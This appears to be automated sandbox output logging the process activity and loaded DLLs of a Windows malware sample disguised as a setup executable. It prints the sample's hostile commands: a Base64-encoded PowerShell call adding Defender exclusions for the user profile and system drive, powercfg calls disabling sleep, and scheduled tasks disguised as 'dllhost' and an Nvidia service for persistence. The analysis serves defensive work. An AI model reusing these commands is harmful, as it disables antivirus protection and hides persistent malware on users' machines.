Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe" Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
